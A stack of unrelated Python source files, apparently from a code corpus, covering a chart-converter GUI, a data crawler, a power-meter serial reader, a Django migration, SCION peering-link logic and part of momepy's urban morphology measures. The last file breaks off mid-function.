self.checkConverterRunning()
def btSelectInputClicked(self, event):
openFileDialog = wx.FileDialog(self, "Select Chart files or directories", "", "",
"all (*.*)|*.*", wx.FD_OPEN | wx.FD_FILE_MUST_EXIST|wx.FD_MULTIPLE)
if openFileDialog.ShowModal() == wx.ID_CANCEL:
return # the user changed idea...
filenames=openFileDialog.GetPaths()
for name in filenames:
self.inputFiles.AppendText("\n"+name)
def btEmptyClicked(self, event):
self.inputFiles.Clear()
def btStartClicked(self, event):
if self.checkConverterRunning():
self.terminateConverter()
return
files=re.split("\n",self.inputFiles.GetValue())
selectedFiles=[]
for f in files:
if f != "":
selectedFiles.append(f)
if len(selectedFiles) < 1:
wx.MessageBox("no files selected")
return
log=[]
if self.cbLogfile.IsChecked():
pass
log=["-e" ,self.txLogfile.GetValue()]
args=["xterm","-T","Avnav Chartconvert","-hold","-e",os.path.join(self.getBaseDir(),"..","chartconvert","read_charts.py")]+log+[ "-b",self.outputDir.GetValue()]
if self.cbNewGemf.IsChecked():
args.append("-g")
if self.updateMode.IsChecked():
args.append("-f")
for name in selectedFiles:
args.append(name)
self.converter=subprocess.Popen(args,cwd=self.getBaseDir())
self.btStart.SetLabel("Stop")
self.checkConverterRunning()
def btOutDefaultClicked(self, event):
self.outputDir.SetValue(self.defaultOut)
def btSelectOutClicked(self, event):
openFileDialog = wx.DirDialog(self, "Select Output Dir", style=1,defaultPath=self.defaultOut)
if openFileDialog.ShowModal() == wx.ID_CANCEL:
return # the user changed idea...
self.outputDir.SetValue(openFileDialog.GetPath())
def btLogfileClicked(self, event):
openFileDialog = wx.FileDialog(self, "Select Logfile", style=1,defaultFile=self.txLogfile.GetValue())
if openFileDialog.ShowModal() == wx.ID_CANCEL:
return # the user changed idea...
self.txLogfile.SetValue(openFileDialog.GetPath())
if __name__ == "__main__":
app = wx.PySimpleApp(0)
#wx.InitAllImageHandlers()
argv=sys.argv
usage="usage: %s [-b basedir] [-v viewerbase] " % (argv[0])
parser = optparse.OptionParser(
usage = usage,
version="1.0",
description='avnav_gui')
parser.add_option("-b", "--basedir", dest="basedir", help="set the basedir for the server")
parser.add_option("-u", "--urlmap", dest="urlmap", help="set some urlmap for the server")
(options, args) = parser.parse_args(argv[1:])
frame_1 = AvnavGui(None, -1, "")
if not options.basedir is None:
frame_1.setServerBase(options.basedir)
if not options.urlmap is None:
frame_1.setUrlMap(options.urlmap)
app.SetTopWindow(frame_1)
frame_1.Show()
app.MainLoop()
| 8,486 | 2,575 |
#!/usr/bin/env python
# -----------------------------------------------------------------------------
# Name: crawlAll.py
# Purpose: Crawl and catalog using crawler config in crawler directory.
#
# Author: Gerald Manipon
#
# Created: Wed Nov 29 18:42:34 2006
# Copyright: (c) 2006, California Institute of Technology.
# U.S. Government Sponsorship acknowledged.
# -----------------------------------------------------------------------------
import os
import sys
import glob
import tempfile
import traceback
from datetime import datetime as DT
from sciflo.catalog import *
from sciflo.utils import *
# check if currently running; if not, lock; otherwise exit immediately
lockFile = os.path.join(tempfile.gettempdir(),
'crawler.%s.lck' % getpass.getuser())
if os.path.exists(lockFile):
lockingPid = open(lockFile, 'r').read()
if os.path.isdir(os.path.join('/proc', lockingPid)) and lockingPid != '':
print(("%s: Process %s already running." %
(DT.utcfromtimestamp(time.time()).isoformat(), lockingPid)))
sys.exit(0)
else:
print(("%s: Zombie process? Removed lock with pid %s." %
(DT.utcfromtimestamp(time.time()).isoformat(), lockingPid)))
os.unlink(lockFile)
# create lock file
currentPid = str(os.getpid())
f = open(lockFile, 'w')
f.write(currentPid)
f.close()
# get vars
scp = ScifloConfigParser()
dbPort = scp.getParameter('dbPort')
dbUser = scp.getParameter('dbUser')
dbPassword = scp.getParameter('dbPassword')
if dbUser in [None, 'None', '']:
schema = 'mysql://127.0.0.1:%s/urlCatalog' % dbPort
else:
if dbPassword in [None, 'None', '']:
schema = 'mysql://%s@127.0.0.1:%s/urlCatalog' % (dbUser, dbPort)
else:
schema = 'mysql://%s:%s@127.0.0.1:%s/urlCatalog' % (
dbUser, dbPassword, dbPort)
crawlerConfigDir = os.path.join(sys.prefix, 'etc', 'crawler')
if len(sys.argv) == 1:
xmlConfigFiles = glob.glob(os.path.join(crawlerConfigDir, '*.xml'))
else:
xmlConfigFiles = sys.argv[1:]
for xmlConfigFile in xmlConfigFiles:
try:
print(("Doing", xmlConfigFile))
libobj = ScifloLibrarian(xmlConfigFile)
instr = libobj.getInstrument()
level = libobj.getLevel()
catalogobj = SqlAlchemyCatalog(schema)
libobj.setCatalog(catalogobj)
retval = libobj.crawlAndCatalog(page=True)
print(("Finished crawlAndCatalog() with: ", retval))
except:
traceback.print_exc()
raise SystemExit(1)
# remove lock file
os.unlink(lockFile)
print(("%s: Script finished. Removed lock with pid %s." %
(DT.utcfromtimestamp(time.time()).isoformat(), currentPid)))
| 2,714 | 907 |
"""
Communication with APATOR EC3 power meter to get its actual readings.
"""
from __future__ import annotations
__author__ = 'Holger Fleischmann'
__copyright__ = 'Copyright 2021, Holger Fleischmann, Bavaria/Germany'
__license__ = 'Apache License 2.0'
import logging
import time
from typing import NamedTuple, Optional, Callable, List
import serial
from serial import SEVENBITS, PARITY_EVEN, SerialException
from utils import RepeatTimer
logger = logging.getLogger().getChild(__name__)
class PowerMeterReading(NamedTuple):
success: bool
consumption_total_sum_kwh: Optional[float]
consumption_high_sum_kwh: Optional[float]
consumption_low_sum_kwh: Optional[float]
class PowerMeterApatorEC3:
"""
Communication object to get readings from an APATOR EC3 electrical power meter.
Tested only with a 12EC3 two tariff version to get the readings for 1.8.1 and 1.8.2 OBIS values.
Unfortunately, this meter does not provide any actual effective power values.
Uses serial communication with the front IR interface.
Sends a request to the power meter and reads it's response, i.e. a bidirectional
TX/RX infrared interface must be connected to the serial port.
Communication needs quite long timeouts and delays because the meter is reaaaaally slow.
"""
serial_port: str
_serial: Optional[serial.Serial]
def __init__(self, serial_port: str):
"""
Create new communication object for power meter.
Does not yet open the serial port.
:param serial_port: serial port to use, e.g. "COM5" on Windows or "/dev/serialUSB0" on Linux
"""
self.serial_port = serial_port
self._serial = None
def open(self) -> None:
"""
Open the serial port if not open yet. Don't forget to close it when not needed any more.
:raises: serial.serialutil.SerialException
"""
if self._serial is None:
logger.info("Opening serial port " + self.serial_port)
self._serial = \
serial.Serial(self.serial_port,
baudrate=300, bytesize=SEVENBITS, parity=PARITY_EVEN,
timeout=10)
def close(self) -> None:
"""
Close the serial port if open.
"""
if self._serial is not None:
logger.info("Closing serial port " + self.serial_port)
self._serial.close()
self._serial = None
def read_raw(self) -> str:
"""
Read the raw response from the power meter.
:return: raw response string
:raises: serial.serialutil.SerialException if communication failed
"""
logger.debug("Sending request on serial port ...")
request = b'/?!\r\n'
self._serial.write(request)
self._serial.flush()
time.sleep(2)
ack_output = b'\x06000\r\n'
self._serial.write(ack_output)
self._serial.flush()
time.sleep(2)
logger.debug("Reading response from serial port ...")
data = self._serial.read(65536)
if len(data) > 0:
logger.debug("Response:\n" + data.decode("ascii"))
return data.decode("ascii")
def read(self) -> PowerMeterReading:
"""
Try to read values from the power meter. Automatically opens the serial interface
if not yet open. Closes it upon SerialException to force reopening on next attempt.
:return: reading with values for the case of success, empty reading in case of failure
"""
try:
self.open()
return self._parse_raw(self.read_raw())
except SerialException:
self.close()
return PowerMeterReading(False, None, None, None)
def _parse_raw(self, raw: str) -> PowerMeterReading:
high = None
low = None
for line in raw.splitlines(keepends=False):
cleaned = line.strip('\x02\x03\n\r \t')
if cleaned.startswith("1.8.1*"):
high = self._parse_line_float(cleaned)
elif cleaned.startswith("1.8.2*"):
low = self._parse_line_float(cleaned)
if high is not None and low is not None:
total = high + low
else:
total = None
return PowerMeterReading(True, total, high, low)
def _parse_line_str(self, cleaned_line: str) -> Optional[str]:
begin = cleaned_line.find("(") + 1
end = cleaned_line.rfind(")")
if begin != -1 and end != -1:
return cleaned_line[begin:end]
else:
return None
def _parse_line_float(self, cleaned_line: str) -> Optional[float]:
try:
return float(self._parse_line_str(cleaned_line))
except ValueError:
return None
class SingleCounter:
_prev_reading: Optional[float]
_prev_was_edge: bool
power: Optional[float]
power_from_ts: Optional[float]
power_to_ts: Optional[float]
def __init__(self):
self._prev_reading = None
self._prev_was_edge = False
self.power = None
self.power_from_ts = None
self.power_to_ts = None
def update(self, reading_kwh: Optional[float], reading_ts: float, min_averaging_secs: float,
other_counter: SingleCounter):
if reading_kwh is not None \
and self._prev_reading != reading_kwh \
and (self.power_to_ts is None or (reading_ts - self.power_to_ts) >= min_averaging_secs):
if self._prev_was_edge and self.power_to_ts is not None:
self.power = (reading_kwh - self._prev_reading) * 3.6e6 / \
(reading_ts - self.power_to_ts)
self.power_from_ts = self.power_to_ts
other_counter.power = 0
other_counter.power_from_ts = self.power_from_ts
other_counter._prev_was_edge = True
if self._prev_reading is not None:
self._prev_was_edge = True
self._prev_reading = reading_kwh
self.power_to_ts = reading_ts
class PowerMeterApatorEC3Repeating:
min_averaging_secs: float
_power_meter: PowerMeterApatorEC3
_timer: RepeatTimer
reading: Optional[PowerMeterReading]
reading_ts: Optional[float]
success: bool
high: SingleCounter
low: SingleCounter
callbacks: List[Callable[[Optional[PowerMeterReading]], None]]
def __init__(self, power_meter: PowerMeterApatorEC3, interval: float, min_averaging_secs: float):
self.min_averaging_secs = min_averaging_secs
self._power_meter = power_meter
self._timer = RepeatTimer(interval, self._acquire)
self.reading = None
self.reading_ts = None
self.success = False
self.high = SingleCounter()
self.low = SingleCounter()
self.callbacks = []
def add_callback(self, callback: Callable[[Optional[PowerMeterReading]], None]):
self.callbacks.append(callback)
def start(self):
if not self._timer.is_alive():
self._timer.start()
def stop(self):
self._timer.cancel()
self._power_meter.close()
def _acquire(self):
try:
ts = time.time()
self.reading = self._power_meter.read()
self.reading_ts = ts
self._update_high_power()
self._update_low_power()
self.success = True
except SerialException:
self.success = False
self._fire()
def _update_low_power(self):
self.low.update(self.reading.consumption_low_sum_kwh, self.reading_ts, self.min_averaging_secs, self.high)
def _update_high_power(self):
self.high.update(self.reading.consumption_high_sum_kwh, self.reading_ts, self.min_averaging_secs, self.low)
def _fire(self):
for callback in self.callbacks:
callback(self.reading)
if __name__ == '__main__':
pm = PowerMeterApatorEC3Repeating(PowerMeterApatorEC3("COM5"), 30, 10)
pm.callbacks.append(lambda r: print(pm.success, r, pm.reading_ts, pm.low.power, pm.high.power))
pm.start()
| 8,162 | 2,449 |
# Generated by Django 2.2 on 2019-04-21 21:40
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0008_auto_20190421_1144'),
]
operations = [
migrations.AlterField(
model_name='brafitting',
name='fitting_user',
field=models.ForeignKey(blank=True, default=True, on_delete=django.db.models.deletion.CASCADE, related_name='fittings', to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
migrations.AlterField(
model_name='suggestion',
name='fitting_session',
field=models.ForeignKey(blank=True, default=True, on_delete=django.db.models.deletion.CASCADE, related_name='suggestions', to='core.BraFitting'),
preserve_default=False,
),
]
| 913 | 302 |
"""Functions for updating links according to peering policies"""
from django.db import transaction
from django.db.models import Q, QuerySet
from peering_coord.api.client_connection import ClientRegistry
from peering_coord.api.peering_pb2 import AsyncError
from peering_coord.models.ixp import VLAN, Interface, Owner
from peering_coord.models.policies import (
AsPeerPolicy, DefaultPolicy, IsdPeerPolicy, OwnerPeerPolicy)
from peering_coord.models.scion import AS, AcceptedPeer, Link
@transaction.atomic
def update_accepted_peers(vlan: VLAN, asys: AS) -> None:
"""Update the AcceptedPeer relation of ASes accepted for peering.
:param vlan: Peering VLAN to update.
:param asys: AS whose accepted peers are updated.
"""
old = AcceptedPeer.objects.filter(vlan=vlan, asys=asys).values_list('peer_id')
new = _get_accepted_peers(vlan, asys)
# Calculate which peers to add/remove.
remove = old.difference(new)
add = new.difference(old)
# Remove peers which are no longer accepted.
AcceptedPeer.objects.filter(vlan=vlan, asys=asys, peer_id__in=remove).delete()
# Add peers which are not accepted at the moment.
AcceptedPeer.objects.bulk_create(
AcceptedPeer(vlan=vlan, asys=asys, peer_id=peer[0]) for peer in add)
def _get_accepted_peers(vlan: VLAN, asys: AS) -> QuerySet:
"""Get the set of ASes `asys` accepts for peering.
:param vlan: Peering VLAN considered by the query.
:param asys: AS whose potential peers are retrieved.
:returns: A `QuerySet` of AS primary keys as returned by `values_list`.
"""
# AS-level policies
as_accept = AsPeerPolicy.objects.filter(
vlan=vlan, asys=asys, accept=True).values_list('peer_as_id')
as_reject = AsPeerPolicy.objects.filter(
vlan=vlan, asys=asys, accept=False).values_list('peer_as_id')
# Owner-level policies
org_accept = Owner.objects.filter(
id__in=OwnerPeerPolicy.objects.filter(
vlan=vlan, asys=asys, accept=True).values_list('peer_owner_id'))
org_reject = Owner.objects.filter(
id__in=OwnerPeerPolicy.objects.filter(
vlan=vlan, asys=asys, accept=False).values_list('peer_owner_id'))
# ISD-level policies
isd_accept = IsdPeerPolicy.objects.filter(
vlan=vlan, asys=asys, accept=True).values_list('peer_isd_id')
isd_reject = IsdPeerPolicy.objects.filter(
vlan=vlan, asys=asys, accept=False).values_list('peer_isd_id')
# Put it all together
# Note: The same AS/Owner/ISD cannot be accepted *and* rejected at the same time.
as_accepted_by_org = AS.objects.filter(
Q(owner_id__in=org_accept) & ~Q(id=asys.id)).values_list('id')
as_rejected_by_org = AS.objects.filter(
Q(owner_id__in=org_reject) & ~Q(id=asys.id)).values_list('id')
as_accepted_by_isd = AS.objects.filter(
Q(isd_id__in=isd_accept) & ~Q(id=asys.id)).values_list('id')
accept = as_accept.union(
as_accepted_by_org.difference(as_reject),
as_accepted_by_isd.difference(as_rejected_by_org, as_reject)
)
# Handle default accept policy
if DefaultPolicy.objects.filter(vlan=vlan, asys=asys, accept=True).exists():
as_rejected_by_isd = AS.objects.filter(
Q(isd_id__in=isd_reject) & ~Q(id=asys.id)).values_list('id')
as_all = vlan.members.values_list('asys', flat=True).filter(~Q(asys=asys.id)).distinct()
accept = accept.union(as_all.difference(as_rejected_by_isd, as_rejected_by_org, as_reject))
return accept
@transaction.atomic
def update_links(vlan: VLAN, asys: AS) -> None:
"""Create and delete links of the given AS to reflect the peering accepted by it and its peers.
Uses accepted peerings from AcceptedPeer relation instead of evaluating the peering policies
directly. update_accepted_peers() must be called on every ASes whose policies have changed for
this function to get up-to-date data.
:param vlan: Peering VLAN to update.
:param asys: AS whose links are updated.
"""
# Get currently connected ASes.
peers_old = asys.query_connected_peers(vlan=vlan)
# Get ASes that should be connected.
peers_new = asys.query_mutually_accepted_peers(vlan=vlan)
# Calculate which links to add/remove.
remove = peers_old.difference(peers_new)
add = peers_new.difference(peers_old)
# Remove old links.
Link.objects.filter(
Q(interface_a__vlan=vlan) # both interfaces are always in the same VLAN
& (Q(interface_a__peering_client__asys=asys, interface_b__peering_client__asys__in=remove)
| Q(interface_a__peering_client__asys__in=remove, interface_b__peering_client__asys=asys))
).delete()
# Add new links.
for peer_id in add:
peer = AS.objects.get(id=peer_id[0])
_create_links(vlan, asys, peer)
def _create_links(vlan: VLAN, as_a: AS, as_b: AS):
"""Create links between all interfaces of `as_a` and `as_b` in `vlan`.
The link type is determined from the AS types.
"""
# Figure out which link type to use.
if as_a.is_core and as_b.is_core:
link_type = Link.Type.CORE
elif not as_a.is_core and not as_b.is_core:
link_type = Link.Type.PEERING
elif as_a.isd == as_b.isd:
link_type = Link.Type.PROVIDER
if not as_a.is_core and as_b.is_core:
as_a, as_b = as_b, as_a
else:
error = AsyncError()
error.code = AsyncError.Code.LINK_CREATION_FAILED
error.message = "Cannot create a link between ASes {} and {} of incompatible type.".format(
as_a, as_b
)
ClientRegistry.send_async_error(as_a.asn, error)
ClientRegistry.send_async_error(as_b.asn, error)
return
for interface_a in as_a.query_interfaces().filter(vlan=vlan).all():
for interface_b in as_b.query_interfaces().filter(vlan=vlan).all():
port_a = port_b = None
try:
port_a = interface_a.get_unused_port()
except Interface.NoUnusedPorts:
error = AsyncError()
error.code = AsyncError.Code.LINK_CREATION_FAILED
error.message = "Allocated port range is exhausted on interface {}.".format(
interface_a)
ClientRegistry.send_async_error(as_a.asn, error)
try:
port_b = interface_b.get_unused_port()
except Interface.NoUnusedPorts:
error = AsyncError()
error.code = AsyncError.Code.LINK_CREATION_FAILED
error.message = "Allocated port range is exhausted on interface {}.".format(
interface_b)
ClientRegistry.send_async_error(as_b.asn, error)
if port_a and port_b:
Link.objects.create(link_type,
interface_a=interface_a, interface_b=interface_b,
port_a=port_a, port_b=port_b)
| 6,939 | 2,372 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# dimension.py
# definitions of dimension characters
import math
import numpy as np
import pandas as pd
import scipy as sp
from shapely.geometry import LineString, Point, Polygon
from tqdm import tqdm
from .shape import _make_circle
__all__ = [
"Area",
"Perimeter",
"Volume",
"FloorArea",
"CourtyardArea",
"LongestAxisLength",
"AverageCharacter",
"StreetProfile",
"WeightedCharacter",
"CoveredArea",
"PerimeterWall",
"SegmentsLength",
]
class Area:
"""
Calculates area of each object in given GeoDataFrame. It can be used for any
suitable element (building footprint, plot, tessellation, block).
It is a simple wrapper for GeoPandas ``.area`` for the consistency of momepy.
Parameters
----------
gdf : GeoDataFrame
GeoDataFrame containing objects to analyse
Attributes
----------
series : Series
Series containing resulting values
gdf : GeoDataFrame
original GeoDataFrame
Examples
--------
>>> buildings = gpd.read_file(momepy.datasets.get_path('bubenec'), layer='buildings')
>>> buildings['area'] = momepy.Area(buildings).series
>>> buildings.area[0]
728.5574947044363
"""
def __init__(self, gdf):
self.gdf = gdf
self.series = self.gdf.geometry.area
class Perimeter:
"""
Calculates perimeter of each object in given GeoDataFrame. It can be used for any
suitable element (building footprint, plot, tessellation, block).
It is a simple wrapper for GeoPandas ``.length`` for the consistency of momepy.
Parameters
----------
gdf : GeoDataFrame
GeoDataFrame containing objects to analyse
Attributes
----------
series : Series
Series containing resulting values
gdf : GeoDataFrame
original GeoDataFrame
Examples
--------
>>> buildings = gpd.read_file(momepy.datasets.get_path('bubenec'), layer='buildings')
>>> buildings['perimeter'] = momepy.Perimeter(buildings).series
>>> buildings.perimeter[0]
137.18630991119903
"""
def __init__(self, gdf):
self.gdf = gdf
self.series = self.gdf.geometry.length
class Volume:
"""
Calculates volume of each object in given GeoDataFrame based on its height and area.
.. math::
area * height
Parameters
----------
gdf : GeoDataFrame
GeoDataFrame containing objects to analyse
heights : str, list, np.array, pd.Series
the name of the dataframe column, ``np.array``, or ``pd.Series`` where is stored height value
areas : str, list, np.array, pd.Series (default None)
the name of the dataframe column, ``np.array``, or ``pd.Series`` where is stored area value. If set to None, function will calculate areas
during the process without saving them separately.
Attributes
----------
series : Series
Series containing resulting values
gdf : GeoDataFrame
original GeoDataFrame
heights : Series
Series containing used heights values
areas : GeoDataFrame
Series containing used areas values
Examples
--------
>>> buildings['volume'] = momepy.Volume(buildings, heights='height_col').series
>>> buildings.volume[0]
7285.5749470443625
>>> buildings['volume'] = momepy.Volume(buildings, heights='height_col', areas='area_col').series
>>> buildings.volume[0]
7285.5749470443625
"""
def __init__(self, gdf, heights, areas=None):
self.gdf = gdf
gdf = gdf.copy()
if not isinstance(heights, str):
gdf["mm_h"] = heights
heights = "mm_h"
self.heights = gdf[heights]
if areas is not None:
if not isinstance(areas, str):
gdf["mm_a"] = areas
areas = "mm_a"
self.areas = gdf[areas]
else:
self.areas = gdf.geometry.area
try:
self.series = self.areas * self.heights
except KeyError:
raise KeyError(
"ERROR: Column not found. Define heights and areas or set areas to None."
)
class FloorArea:
"""
Calculates floor area of each object based on height and area.
Number of floors is simplified into formula height / 3
(it is assumed that on average one floor is approximately 3 metres)
.. math::
area * \\frac{height}{3}
Parameters
----------
gdf : GeoDataFrame
GeoDataFrame containing objects to analyse
heights : str, list, np.array, pd.Series
the name of the dataframe column, ``np.array``, or ``pd.Series`` where is stored height value
areas : str, list, np.array, pd.Series (default None)
the name of the dataframe column, ``np.array``, or ``pd.Series`` where is stored area value. If set to None, function will calculate areas
during the process without saving them separately.
Attributes
----------
series : Series
Series containing resulting values
gdf : GeoDataFrame
original GeoDataFrame
heights : Series
Series containing used heights values
areas : GeoDataFrame
Series containing used areas values
Examples
--------
>>> buildings['floor_area'] = momepy.FloorArea(buildings, heights='height_col').series
Calculating floor areas...
Floor areas calculated.
>>> buildings.floor_area[0]
2185.672484113309
>>> buildings['floor_area'] = momepy.FloorArea(buildings, heights='height_col', areas='area_col').series
>>> buildings.floor_area[0]
2185.672484113309
"""
def __init__(self, gdf, heights, areas=None):
self.gdf = gdf
gdf = gdf.copy()
if not isinstance(heights, str):
gdf["mm_h"] = heights
heights = "mm_h"
self.heights = gdf[heights]
if areas is not None:
if not isinstance(areas, str):
gdf["mm_a"] = areas
areas = "mm_a"
self.areas = gdf[areas]
else:
self.areas = gdf.geometry.area
try:
self.series = self.areas * (self.heights // 3)
except KeyError:
raise KeyError(
"ERROR: Column not found. Define heights and areas or set areas to None."
)
class CourtyardArea:
"""
Calculates area of holes within geometry - area of courtyards.
Ensure that your geometry is ``shapely.geometry.Polygon``.
Parameters
----------
gdf : GeoDataFrame
GeoDataFrame containing objects to analyse
areas : str, list, np.array, pd.Series (default None)
the name of the dataframe column, ``np.array``, or ``pd.Series`` where is stored area value. If set to None, function will calculate areas
during the process without saving them separately.
Attributes
----------
series : Series
Series containing resulting values
gdf : GeoDataFrame
original GeoDataFrame
areas : GeoDataFrame
Series containing used areas values
Examples
--------
>>> buildings['courtyard_area'] = momepy.CourtyardArea(buildings).series
>>> buildings.courtyard_area[80]
353.33274206543274
"""
def __init__(self, gdf, areas=None):
self.gdf = gdf
gdf = gdf.copy()
if areas is None:
areas = gdf.geometry.area
if not isinstance(areas, str):
gdf["mm_a"] = areas
areas = "mm_a"
self.areas = gdf[areas]
exts = gdf.geometry.apply(lambda g: Polygon(g.exterior))
self.series = pd.Series(exts.area - gdf[areas], index=gdf.index)
# calculate the radius of circumcircle
def _longest_axis(points):
circ = _make_circle(points)
return circ[2] * 2
class LongestAxisLength:
"""
Calculates the length of the longest axis of object.
Axis is defined as a diameter of minimal circumscribed circle around the convex hull.
It does not have to be fully inside an object.
.. math::
\\max \\left\\{d_{1}, d_{2}, \\ldots, d_{n}\\right\\}
Parameters
----------
gdf : GeoDataFrame
GeoDataFrame containing objects to analyse
Attributes
----------
series : Series
Series containing resulting values
gdf : GeoDataFrame
original GeoDataFrame
Examples
--------
>>> buildings['lal'] = momepy.LongestAxisLength(buildings).series
>>> buildings.lal[0]
40.2655616057102
"""
def __init__(self, gdf):
self.gdf = gdf
hulls = gdf.geometry.convex_hull
self.series = hulls.apply(lambda hull: _longest_axis(hull.exterior.coords))
class AverageCharacter:
"""
Calculates the average of a character within a set neighbourhood defined in ``spatial_weights``
Average value of the character within a set neighbourhood defined in ``spatial_weights``.
Can be set to ``mean``, ``median`` or ``mode``. ``mean`` is defined as:
.. math::
\\frac{1}{n}\\left(\\sum_{i=1}^{n} value_{i}\\right)
Adapted from :cite:`hausleitner2017`.
Parameters
----------
gdf : GeoDataFrame
GeoDataFrame containing morphological tessellation
values : str, list, np.array, pd.Series
the name of the dataframe column, ``np.array``, or ``pd.Series`` where is stored character value.
unique_id : str
name of the column with unique id used as ``spatial_weights`` index.
spatial_weights : libpysal.weights
spatial weights matrix
rng : Two-element sequence containing floats in range of [0,100], optional
Percentiles over which to compute the range. Each must be
between 0 and 100, inclusive. The order of the elements is not important.
mode : str (default 'all')
mode of average calculation. Can be set to `all`, `mean`, `median` or `mode` or
list of any of the options.
Attributes
----------
series : Series
Series containing resulting mean values
mean : Series
Series containing resulting mean values
median : Series
Series containing resulting median values
mode : Series
Series containing resulting mode values
gdf : GeoDataFrame
original GeoDataFrame
values : GeoDataFrame
Series containing used values
sw : libpysal.weights
spatial weights matrix
id : Series
Series containing used unique ID
rng : tuple
range
modes : str
mode
Examples
--------
>>> sw = libpysal.weights.DistanceBand.from_dataframe(tessellation, threshold=100, silence_warnings=True, ids='uID')
>>> tessellation['mean_area'] = momepy.AverageCharacter(tessellation, values='area', spatial_weights=sw, unique_id='uID').mean
100%|██████████| 144/144 [00:00<00:00, 1433.32it/s]
>>> tessellation.mean_area[0]
4823.1334436678835
"""
def __init__(self, gdf, values, spatial_weights, unique_id, rng=None, mode="all"):
self.gdf = gdf
self.sw = spatial_weights
self.id = gdf[unique_id]
self.rng = rng
self.modes = mode
if rng:
from momepy import limit_range
data = gdf.copy()
if values is not None:
if not isinstance(values, str):
data["mm_v"] = values
values = "mm_v"
self.values = data[values]
data = data.set_index(unique_id)[values]
means = []
medians = []
modes = []
allowed = ["mean", "median", "mode"]
if mode == "all":
mode = allowed
elif isinstance(mode, list):
for m in mode:
if m not in allowed:
raise ValueError("{} is not supported as mode.".format(mode))
elif isinstance(mode, str):
if mode not in allowed:
raise ValueError("{} is not supported as mode.".format(mode))
mode = [mode]
for index in tqdm(data.index, total=data.shape[0]):
if index in spatial_weights.neighbors.keys():
neighbours = spatial_weights.neighbors[index].copy()
if neighbours:
neighbours.append(index)
else:
neighbours = [index]
values_list = data.loc[neighbours]
if rng:
values_list = limit_range(values_list, rng=rng)
if "mean" in mode:
means.append(np.mean(values_list))
if "median" in mode:
medians.append(np.median(values_list))
if "mode" in mode:
modes.append(sp.stats.mode(values_list)[0][0])
else:
if "mean" in mode:
means.append(np.nan)
if "median" in mode:
medians.append(np.nan)
if "mode" in mode:
modes.append(np.nan)
if "mean" in mode:
self.series = self.mean = pd.Series(means, index=gdf.index)
if "median" in mode:
self.median = pd.Series(medians, index=gdf.index)
if "mode" in mode:
self.mode = pd.Series(modes, index=gdf.index)
class StreetProfile:
"""
Calculates the street profile characters.
Returns a dictionary with widths, standard deviation of width, openness, heights,
standard deviation of height and ratio height/width. Algorithm generates perpendicular
lines to ``right`` dataframe features every ``distance`` and measures values on intersection
with features of ``left``. If no feature is reached within
``tick_length`` its value is set as width (being a theoretical maximum).
Derived from :cite:`araldi2019`.
Parameters
----------
left : GeoDataFrame
GeoDataFrame containing streets to analyse
right : GeoDataFrame
GeoDataFrame containing buildings along the streets (only Polygon geometry type is supported)
heights: str, list, np.array, pd.Series (default None)
the name of the buildings dataframe column, ``np.array``, or ``pd.Series`` where is stored building height. If set to None,
height and ratio height/width will not be calculated.
distance : int (default 10)
distance between perpendicular ticks
tick_length : int (default 50)
length of ticks
Attributes
----------
w : Series
Series containing street profile width values
wd : Series
Series containing street profile standard deviation values
o : Series
Series containing street profile openness values
h : Series
Series containing street profile heights values. Returned only when heights is set.
hd : Series
Series containing street profile heights standard deviation values. Returned only when heights is set.
p : Series
Series containing street profile height/width ratio values. Returned only when heights is set.
left : GeoDataFrame
original left GeoDataFrame
right : GeoDataFrame
original right GeoDataFrame
distance : int
distance between perpendicular ticks
tick_length : int
length of ticks
heights : GeoDataFrame
Series containing used height values
Examples
--------
>>> street_profile = momepy.StreetProfile(streets_df, buildings_df, heights='height')
100%|██████████| 33/33 [00:02<00:00, 15.66it/s]
>>> streets_df['width'] = street_profile.w
>>> streets_df['deviations'] = street_profile.wd
"""
def __init__(self, left, right, heights=None, distance=10, tick_length=50):
self.left = left
self.right = right
self.distance = distance
self.tick_length = tick_length
if heights is not None:
if not isinstance(heights, str):
right = right.copy()
right["mm_h"] = heights
heights = "mm_h"
self.heights = right[heights]
sindex = right.sindex
results_list = []
deviations_list = []
heights_list = []
heights_deviations_list = []
openness_list = []
for idx, row in tqdm(left.iterrows(), total=left.shape[0]):
# list to hold all the point coords
list_points = []
# set the current distance to place the point
current_dist = distance
# make shapely MultiLineString object
shapely_line = row.geometry
# get the total length of the line
line_length = shapely_line.length
# append the starting coordinate to the list
list_points.append(Point(list(shapely_line.coords)[0]))
# https://nathanw.net/2012/08/05/generating-chainage-distance-nodes-in-qgis/
# while the current cumulative distance is less than the total length of the line
while current_dist < line_length:
# use interpolate and increase the current distance
list_points.append(shapely_line.interpolate(current_dist))
current_dist += distance
# append end coordinate to the list
list_points.append(Point(list(shapely_line.coords)[-1]))
ticks = []
for num, pt in enumerate(list_points, 1):
# start chainage 0
if num == 1:
angle = self._getAngle(pt, list_points[num])
line_end_1 = self._getPoint1(pt, angle, tick_length / 2)
angle = self._getAngle(line_end_1, pt)
line_end_2 = self._getPoint2(line_end_1, angle, tick_length)
tick1 = LineString([(line_end_1.x, line_end_1.y), (pt.x, pt.y)])
tick2 = LineString([(line_end_2.x, line_end_2.y), (pt.x, pt.y)])
ticks.append([tick1, tick2])
# everything in between
if num < len(list_points) - 1:
angle = self._getAngle(pt, list_points[num])
line_end_1 = self._getPoint1(
list_points[num], angle, tick_length / 2
)
angle = self._getAngle(line_end_1, list_points[num])
line_end_2 = self._getPoint2(line_end_1, angle, tick_length)
tick1 = LineString(
[
(line_end_1.x, line_end_1.y),
(list_points[num].x, list_points[num].y),
]
)
tick2 = LineString(
[
(line_end_2.x, line_end_2.y),
(list_points[num].x, list_points[num].y),
]
)
ticks.append([tick1, tick2])
# end chainage
if num == len(list_points):
angle = self._getAngle(list_points[num - 2], pt)
line_end_1 = self._getPoint1(pt, angle, tick_length / 2)
angle = self._getAngle(line_end_1, pt)
line_end_2 = self._getPoint2(line_end_1, angle, tick_length)
tick1 = LineString([(line_end_1.x, line_end_1.y), (pt.x, pt.y)])
tick2 = LineString([(line_end_2.x, line_end_2.y), (pt.x, pt.y)])
ticks.append([tick1, tick2])
# widths = []
m_heights = []
lefts = []
rights = []
for duo in ticks:
for ix, tick in enumerate(duo):
possible_intersections_index = list(
sindex.intersection(tick.bounds)
)
possible_intersections = right.iloc[possible_intersections_index]
real_intersections = possible_intersections.intersects(tick)
get_height = right.loc[list(real_intersections.index)]
possible_int = get_height.exterior.intersection(tick)
